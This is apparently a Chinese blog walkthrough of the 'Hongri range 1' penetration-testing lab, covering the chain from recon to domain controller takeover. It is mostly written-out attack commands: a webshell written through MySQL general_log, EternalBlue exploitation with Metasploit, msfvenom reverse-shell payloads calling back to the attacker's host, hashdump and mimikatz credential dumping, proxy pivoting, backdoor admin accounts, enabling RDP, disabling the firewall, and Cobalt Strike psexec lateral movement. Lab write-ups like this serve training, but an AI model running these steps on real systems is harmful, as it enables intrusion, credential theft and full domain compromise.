红日靶场1
信息收集
主机发现
端口扫描
开放了80,3306端口
目录扫描
发现了phpmyadmin,phpinfophp,beifen.rar
渗透过程
访问80端口是一个phpstudy探针,发现网站的绝对路径等信息
发现没有可利用的功能点后,访问其他收集到的信息
Getshell
phpmyadmin进行Getshell
访问phpmyadmin
想着爆破一下账号密码,但是试了一下root/root居然登录进去了
使用into写入文件的前提是看secure_file_priv的状态
secure_file_priv是用来限制在那个目录下有读写权限的,再mysql 5.6.34版本后是默认NULL的,此mysql的版本为5.5.53并没有大于5.6.34
当它的值为NULL时,则表示不允许进行读写
当它的值为一个路径时(例如/tmp),则表示只能再/tmp目录下读写
当它没有值时,则表示没有限制
执行select @@secure_file_priv查看状态为null说明不能够通过这种方式写入shell
既然直接写行不通,尝试日志写shell,查看日志状态以及存储位置:
show global variables like '%general_%'
日志是关闭的,开启日志并且更改日志存储位置,尝试写一句话到shell
SET GLOBAL general_log = "ON"
将日志文件保存为php文件
SET GLOBAL general_log_file="C:/phpStudy/www/4.php"
利用一句话马
SELECT '';
使用蚁剑进行连接
文件上传进行Getshell
访问yxcms,主页直接给出后台地址和默认账号密码
admin/123456成功登录
寻找到,在前台模板中可以创建php文件,进行写入木马
这里并没有发现网站的绝对路径,但是前面我们收集到了一个beifen.rar文件,他是网站的源码,在源码中寻找前台模板中任意一个php文件的名字就可以找到绝对路径。
/yxcms/protected/apps/default/view/default/shell.php
MS17-010进行Getshell
使用永恒之蓝MS17-010
使用goby对目标网站进行扫描,扫描出来一个MS17-010永恒之蓝漏洞
加载MS17-010扫描模块开扫
use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.227.221
run
确认存在永恒之蓝漏洞
加载永恒之蓝攻击模块
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.227.221
run
后渗透
如果使用MS17-010进行getshell可以直接进行msf上线,但是如果用前两个方式getshell还需要进行上线msf
生成木马
msfvenom -p windows/meterpreter_reverse_tcp LHOST=kali的ip LPORT=1234 -f exe -o shell.exe
将木马使用蚁剑上传到目标主机
use exploit/mutli/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost kali的ip
set lport 1234
run
监听后执行以下shell.exe就可以在kali中看到会话反弹了
ps查看一下进程
进程迁移一班迁移到explorer.exe
migrate 3188
提权
getsystem
获取密码
方式一
查看hash密码
hashdump
方式二
使用hashdump输出的密码是hash值,或者载入kiwi模块直接获取所有密码
首先进行提权
getsystem
load kiwi
creds_all
方式三
kiwi_cmd可以调用mimikatz模块的所有功能
kiwi_cmd sekurlsa::logonpasswords
msf与cmd进行交互
execute -f cmd.exe -i -t
乱码用chcp 65001解决
上线cs
启动服务
./teamserver 192.168.227.16 1234
设置监听
生成后门文件
使用蚁剑上传后门文件
成功上线
执行sleep 0,要不回显时间较长
cs与msf联动
生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=< Your IP> LPORT=< Your Port> -f exe > shell.exe
进行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.227.16(kali的ip)
set lport 4567
run
通过蚁剑上传木马并运行
进行提权
内网信息收集
内网信息收集阶段
进入到主机的shell,chcp 65001解决乱码
route print #打印路由信息
可知192.168.52.0/2是内网网段
ipconfig /all
该域名为god.org
net view /domain #查询当前主机是否加入域,如果加入则列出域名
net view #查看与该计算机位于同一工作组或域中的所有计算机名
定位域控
net time /domain #同步域控服务器时间
横向渗透
使用 msf+proxychains 搭建socks4a隧道。
在之前监听到的shell中设置内网路由
run post/multi/manage/autoroute
查看路由
run autoroute -p
开启代理:
background
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1(这里因为是本机可以写本地ip)
run
jobs
然后在 proxychains 的配置文件 /etc/proxychains.conf,添加本机的1080端口:
socks4 127.0.0.1 1080
然后执行命令时,前面加上 proxychains 即可。如:
proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.141
这里开放了445端口,看一下是否存在ms17-010
use auxiliary/admin/smb/ms17_010_command
set COMMAND net user
set RHOST 192.168.52.141
run
成功执行命令。接着我们来添加一个用户尝试远程登录一下。
还是使用上面的模块,依次执行下面命令
#添加用户
set command net user aaa qwer@1234 /add
run#管理员权限
set command net localgroup administrators aaa /add
run
#开启3389端口
set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
run
#关闭防火墙
set command netsh advfirewall set allprofiles state off
run #好像没有防火墙
远程登陆
proxychains rdesktop 192.168.52.141
登陆的是本机所以log on to选择root那个选项
打靶场的时候是可以远程登录的,但是写文章重新复现了一遍就登录不进来了,不知道为什么
域控渗透
先扫描端口
proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.138
再用上面的老方法 use auxiliary/admin/smb/ms17_010_command 发现可以执行,按照步骤添加新用户,用户可以创建成功,但是登录不进去,转战CS
使用smb beacon的方法,由一台已经拿到beacon的机器,抓取到密码
得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。
先执行 net view 发现一下域内主机
在这里发现域内主机
新建一个 Beacon SMB 监听器,名字随便
域管右键选择psexec
点击运行,成功上线域管,这里顺便把域成员也上线了。可以看到 ∞∞ 这个字符 ,这就是派生的SMB Beacon。
又是打靶场的时候操作成功,写文章的时候环境不知道怎么回事,但是思路是正确的
到此打靶全部完成,断断续续打了半个月,环境总是崩,就需要处理环境的问题,最终还是有一点点问题,有什么不对的地方欢迎提出。